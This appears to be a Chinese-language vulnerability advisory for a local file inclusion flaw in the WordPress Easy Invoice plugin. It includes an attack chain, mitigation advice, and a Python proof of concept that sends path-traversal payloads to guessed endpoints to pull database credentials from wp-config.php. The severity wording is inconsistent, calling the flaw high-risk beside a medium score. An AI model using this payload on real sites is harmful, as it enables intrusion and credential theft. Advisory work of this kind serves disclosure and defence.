CVE-2025-66115 WordPress Easy Invoice插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-66115

漏洞类型

本地文件包含(LFI)

CVSS评分

6.6 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress Easy Invoice (MatrixAddons)

漏洞概述

CVE-2025-66115是WordPress平台下MatrixAddons开发的Easy Invoice插件中的一个高危安全漏洞。该漏洞属于PHP本地文件包含(Local File Inclusion)类型，存在于插件的文件包含逻辑中。由于插件对用户输入的文件路径参数缺乏充分的验证和过滤，攻击者可以通过构造恶意请求，诱使服务器包含任意本地文件，包括敏感的配置文件、PHP源代码文件等。此漏洞的CVSS评分为6.6(中等严重程度)，攻击复杂度较低，但需要高权限认证。攻击成功可能导致敏感信息泄露、服务器配置暴露，甚至在特定条件下可能实现远程代码执行。Easy Invoice插件是一款用于WordPress网站的发票生成管理工具，被众多企业和个人用户使用，因此该漏洞可能影响大量使用该插件的WordPress网站。建议用户立即检查并更新到最新版本以修复此安全风险。

技术细节

该漏洞存在于Easy Invoice插件的文件包含处理逻辑中。插件在处理某些功能请求时，直接将用户可控的参数值传递给PHP的include/require语句，而没有对路径进行充分的验证和限制。攻击者可以利用路径遍历技术(如使用../序列)来访问服务器上的敏感文件。例如，攻击者可能通过构造类似?file=../../../../../../etc/passwd的请求来读取系统密码文件，或者访问wp-config.php获取数据库凭证等敏感配置信息。由于该漏洞允许包含任意本地PHP文件，在某些配置下还可能结合文件上传功能实现远程代码执行。漏洞的根本原因在于使用了不安全的动态文件包含机制，缺少基于白名单的文件验证和realpath()等安全函数的使用。攻击者通常需要认证为WordPress管理员或具有相应权限的用户才能触发此漏洞，但一旦成功利用，将对网站安全性造成严重威胁。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站是否安装并启用Easy Invoice插件(版本<=2.1.4)

STEP 2

步骤2

攻击者通过目录遍历Payload(如../../../../../../etc/passwd)测试LFI漏洞是否存在

STEP 3

步骤3

确认漏洞后，攻击者构造恶意请求读取服务器敏感文件，如wp-config.php获取数据库凭证

STEP 4

步骤4

利用获取的凭证信息进一步渗透，或结合其他漏洞(如文件上传)实现RCE

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-66115 PoC - WordPress Easy Invoice LFI
# Target: WordPress site with Easy Invoice plugin <= 2.1.4

target = "http://target-wordpress-site.com"

# LFI payload to read wp-config.php
lfi_payload = "../../../../../../wp-config.php"

# Common vulnerable endpoints
vulnerable_paths = [
    "/wp-admin/admin-ajax.php",
    "/wp-content/plugins/easy-invoice/includes/file.php",
    "/wp-content/plugins/easy-invoice/ajax.php"
]

# Check each potential endpoint
for path in vulnerable_paths:
    url = f"{target}{path}"
    params = {
        "action": "easy_invoice_file_include",
        "file": lfi_payload
    }
    
    try:
        response = requests.get(url, params=params, timeout=10)
        if "DB_NAME" in response.text or "DB_USER" in response.text:
            print(f"[!] Vulnerable endpoint found: {url}")
            print(f"[+] Extracted config content length: {len(response.text)}")
            # Save extracted content
            with open("extracted_config.txt", "w") as f:
                f.write(response.text)
            print("[+] Configuration saved to extracted_config.txt")
    except requests.RequestException as e:
        print(f"[-] Error testing {url}: {e}")

print("[*] PoC execution completed")

影响范围

Easy Invoice <= 2.1.4

防御指南

临时缓解措施

在官方安全补丁发布之前，建议采取以下临时缓解措施：1)暂时禁用Easy Invoice插件，直到完成安全更新；2)通过Web应用防火墙(WAF)规则阻止包含../序列的请求；3)限制WordPress管理员账户权限，确保只有可信用户具有插件管理权限；4)启用服务器端访问日志监控，及时发现异常的文件包含请求模式；5)考虑使用文件完整性监控工具检测未授权的配置文件访问行为。